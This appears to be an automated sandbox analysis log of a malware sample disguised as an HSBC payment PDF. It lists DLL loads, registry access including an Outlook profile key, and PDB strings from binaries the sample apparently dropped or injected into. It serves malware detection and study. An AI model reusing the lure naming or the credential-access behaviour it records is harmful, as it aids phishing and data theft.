Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe	Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe	Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe	Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: cscapi.dll

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static file information: File size 1561088 > 1048576

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000003.00000003.1934056151.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1319460800.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000003.00000003.2025609014.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2049483592.0000000000820000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2027264483.0000000000930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: armsvc.exe, 00000003.00000003.1388705193.0000000002140000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000003.00000003.1603057705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000003.00000003.1450741177.0000000002190000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000003.00000003.1747697423.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000003.00000003.1747697423.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000003.00000003.1770150076.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000003.00000003.1388705193.0000000002140000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1360363067.0000000004150000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1385180506.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000003.00000003.2099260977.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2102642211.0000000000930000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000003.00000003.1395339924.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source:	Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source:	Binary string: crashreporter.pdb source: armsvc.exe, 00000003.00000003.2220499717.0000000000930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1381346877.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1380529439.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000003.00000003.1666565085.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Spectrum.pdb source: Spectrum.exe.3.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000003.00000003.1924019465.0000000000820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000003.00000003.1416022145.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AgentService.pdb source: AgentService.exe.3.dr
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000003.00000003.2083654743.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: armsvc.exe, 00000003.00000003.1416022145.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000003.00000003.1941194992.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1962182386.0000000000820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000003.00000003.1507196510.0000000002150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000003.00000003.1815785170.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000003.00000003.1622261729.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Spectrum.pdbGCTL source: Spectrum.exe.3.dr
Source:	Binary string: locator.pdb source: armsvc.exe, 00000003.00000003.1407889803.0000000002150000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1413406912.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pingsender.pdb source: pingsender.exe.3.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1347416428.0000000004160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000003.00000003.1770150076.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000003.00000003.1634476509.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000003.00000003.1622261729.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000003.00000003.2025609014.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2049483592.0000000000820000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2027264483.0000000000930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000003.00000003.1666565085.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000003.00000003.1839269821.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
